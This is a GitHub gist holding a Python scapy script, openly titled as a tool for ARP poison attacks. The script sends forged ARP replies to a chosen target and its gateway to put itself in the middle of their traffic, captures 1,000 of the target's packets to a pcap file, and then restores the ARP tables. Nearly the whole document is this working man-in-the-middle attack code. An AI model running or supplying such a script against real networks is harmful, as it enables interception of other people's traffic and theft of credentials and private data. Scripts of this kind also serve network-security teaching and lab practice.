Skip to content

Instantly share code, notes, and snippets.

@juliosmelo
Created September 25, 2020 12:51
Show Gist options
  • Save juliosmelo/d1f6a0dccf9be4428dca855c185e6367 to your computer and use it in GitHub Desktop.
Save juliosmelo/d1f6a0dccf9be4428dca855c185e6367 to your computer and use it in GitHub Desktop.
Python script for ARP poison attacks
import os
import sys
import threading
import signal
from scapy.all import *
HWDST_SRC = "ff:ff:ff:ff:ff:ff"
interface = ""
target_ip = ""
gateway_ip = ""
packet_count = 1000
verbosity = False
iface = interface
def get_mac(ip_address):
responses, unanswered = srp(Ether(dst=HWDST_SRC)/ARP(pdst=ip_address), timeout=2, retry=100)
for s,r in responses:
return r[Ether].src
return
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print(f"[*] Beginning the ARP poison. [CTRL-C to stop]")
while True:
try:
send(poison_target)
send(poison_gateway)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print("[*] ARP poison attack finished")
return
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print(f"[*] Restoring target {target_ip}")
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=HWDST_SRC, hwsrc=gateway_mac), count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=HWDST_SRC, hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
return
print(f"[*] Setting up {interface}")
gateway_mac = get_mac(gateway_ip)
target_mac = get_mac(target_ip)
if gateway_mac == None:
print(f"[!!!] Failed to get gateway MAC. Exiting")
sys.exit(0)
if target_mac == None:
print(f"[!!!] Failed to get target MAC. Exiting")
sys.exit(0)
print(f"[*] Gateway {gateway_ip} is at {gateway_mac}")
print(f"[*] Target {target_ip} is at {target_mac}")
# start poisoning thread
poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print(f"[*] Starting sniffer for {packet_count}")
bpf_filter = f"ip host {target_ip}"
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment